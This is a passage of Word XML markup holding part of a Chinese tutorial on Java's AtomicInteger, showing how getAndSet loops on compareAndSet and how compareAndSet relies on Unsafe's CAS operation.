          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId169" w:tooltip="view plain" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Consolas"/>
            <w:color w:val="A0A0A0"/>
            <w:sz w:val="14"/>
            <w:szCs w:val="14"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>view plain</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Consolas"/>
          <w:color w:val="C0C0C0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId170" w:tgtFrame="_blank" w:tooltip="copy" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Consolas"/>
            <w:color w:val="A0A0A0"/>
            <w:sz w:val="14"/>
            <w:szCs w:val="14"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>copy</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00261FD1" w:rsidRDefault="00261FD1" w:rsidP="00261FD1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Consolas"/>
          <w:color w:val="C0C0C0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId171" w:tgtFrame="_blank" w:tooltip="print" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Consolas"/>
            <w:color w:val="A0A0A0"/>
            <w:sz w:val="14"/>
            <w:szCs w:val="14"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>print</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId172" w:tooltip="?" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Consolas"/>
            <w:color w:val="A0A0A0"/>
            <w:sz w:val="14"/>
            <w:szCs w:val="14"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>?</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00261FD1" w:rsidRDefault="00261FD1" w:rsidP="00261FD1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="71"/>
        </w:numPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="0" w:color="999999"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5FAE2"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="270" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="5C5C5C"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>final</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> getAndSet(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> newValue) {  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00261FD1" w:rsidRDefault="00261FD1" w:rsidP="00261FD1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="71"/>
        </w:numPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="0" w:color="999999"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5FAE2"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="270" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="555555"/>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00FF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> (;;) {  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00261FD1" w:rsidRDefault="00261FD1" w:rsidP="00261FD1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="71"/>
        </w:numPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="0" w:color="999999"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5FAE2"/>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00FF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> current = get();  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00261FD1" w:rsidRDefault="00261FD1" w:rsidP="00261FD1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="71"/>
        </w:numPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="0" w:color="999999"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5FAE2"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="270" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="555555"/>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00FF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> (compareAndSet(current, newValue))  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00261FD1" w:rsidRDefault="00261FD1" w:rsidP="00261FD1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="71"/>
        </w:numPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="0" w:color="999999"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5FAE2"/>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lastRenderedPageBreak/>
        <w:t>            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> current;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00261FD1" w:rsidRDefault="00261FD1" w:rsidP="00261FD1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="71"/>
        </w:numPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="0" w:color="999999"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5FAE2"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="270" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>    }  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00261FD1" w:rsidRDefault="00261FD1" w:rsidP="00261FD1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="71"/>
        </w:numPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="0" w:color="999999"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5FAE2"/>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261FD1" w:rsidRDefault="00261FD1" w:rsidP="00261FD1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>getAndSet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>方法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>JDK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>文档中的解释是：以原子方式设置为给定值，并返回旧值。原子方式体现在何处，就体现在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>compareAndSet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>上，看看</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>compareAndSet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>是如何实现的：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00261FD1" w:rsidRDefault="00261FD1" w:rsidP="00261FD1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:rPr>
          <w:rStyle w:val="tracking-ad"/>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Consolas"/>
          <w:color w:val="C0C0C0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0C0C0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t>[java]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Consolas"/>
          <w:color w:val="C0C0C0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId173" w:tooltip="view plain" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Consolas"/>
            <w:color w:val="A0A0A0"/>
            <w:sz w:val="14"/>
            <w:szCs w:val="14"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>view plain</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Consolas"/>
          <w:color w:val="C0C0C0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId174" w:tgtFrame="_blank" w:tooltip="copy" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Consolas"/>
            <w:color w:val="A0A0A0"/>
            <w:sz w:val="14"/>
            <w:szCs w:val="14"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>copy</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00261FD1" w:rsidRDefault="00261FD1" w:rsidP="00261FD1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Consolas"/>
          <w:color w:val="C0C0C0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId175" w:tgtFrame="_blank" w:tooltip="print" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Consolas"/>
            <w:color w:val="A0A0A0"/>
            <w:sz w:val="14"/>
            <w:szCs w:val="14"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>print</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId176" w:tooltip="?" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Consolas"/>
            <w:color w:val="A0A0A0"/>
            <w:sz w:val="14"/>
            <w:szCs w:val="14"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>?</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00261FD1" w:rsidRDefault="00261FD1" w:rsidP="00261FD1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="72"/>
        </w:numPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="0" w:color="999999"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5FAE2"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="270" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="5C5C5C"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>final</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>boolean</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> compareAndSet(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> expect, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> update) {  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00261FD1" w:rsidRDefault="00261FD1" w:rsidP="00261FD1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="72"/>
        </w:numPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="0" w:color="999999"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5FAE2"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="270" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="555555"/>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00FF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> unsafe.compareAndSwapInt(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>, valueOffset, expect, update);  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00261FD1" w:rsidRDefault="00261FD1" w:rsidP="00261FD1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="72"/>
        </w:numPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="0" w:color="999999"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5FAE2"/>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261FD1" w:rsidRDefault="00261FD1" w:rsidP="00261FD1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>不出所料，它就是采用的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Unsafe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>类的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>CAS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>操作完成的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00261FD1" w:rsidRDefault="00261FD1" w:rsidP="00261FD1">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>再来看看</w:t>
      </w:r>
